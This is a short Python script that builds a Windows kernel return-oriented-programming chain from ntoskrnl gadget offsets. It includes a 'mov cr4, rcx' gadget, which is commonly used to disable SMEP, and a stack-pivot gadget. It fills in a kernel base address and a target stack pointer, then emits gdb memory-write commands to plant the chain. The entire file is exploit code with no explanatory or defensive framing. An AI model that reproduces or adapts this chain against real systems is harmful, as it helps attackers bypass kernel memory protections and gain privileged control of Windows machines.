from pack import p64, u32


#0x00000000172127: mov cr4, rcx; ret;
#0x000000001b5c83: mov rdx, qword ptr [rcx + 0x50]; mov rbp, qword ptr [rcx + 0x18]; mov rsp, qword ptr [rcx + 0x10]; jmp rdx;
#0x0000000001042e: pop rcx; ret;
#0x0000000001042f: ret;

mov_cr4_rcx_ret = 0x00000000172127
mov_rdx_rbp_rsp_jmp_rdx = 0x000000001b5c83
pop_rcx_ret = 0x0000000001042e
ret = 0x0000000001042f

basic_elem = ('BASE_NTOSKRNL', ret)

pattern = [
    2, basic_elem,
    ('TARGET_RSP', ), 0,
    ('BASE_NTOSKRNL', mov_rdx_rbp_rsp_jmp_rdx), basic_elem,
    basic_elem, basic_elem,
    basic_elem, basic_elem,
    ('BASE_NTOSKRNL', pop_rcx_ret)
]


def try_replace_one(elem, **argv):
    if isinstance(elem, tuple):
        if len(elem) == 1:
            return argv[elem[0]]
        else:
            return argv[elem[0]] + elem[1]
    return elem

def replace_with_provided(**argv):
    return b''.join([p64(try_replace_one(x, **argv)) for x in pattern])

def to_gdb(from_addr, raw):
    instrs = ''
    for i in range(0, len(raw), 4):
        instrs += f"set *{hex(from_addr+i)}={hex(u32(raw[i:i+4]))}\n"
    return instrs

if __name__ == '__main__':
    target_rsp = 0xffff9003557f5060
    provided = {
        'BASE_NTOSKRNL': 0xFFFFF801566AF000,
        'TARGET_RSP': target_rsp
    }
    print(replace_with_provided(**provided))
    print(to_gdb(target_rsp, replace_with_provided(**provided)))

    with open('/tmp/script', 'w') as f:
        f.write(to_gdb(target_rsp, replace_with_provided(**provided)))

    print('source /tmp/script')
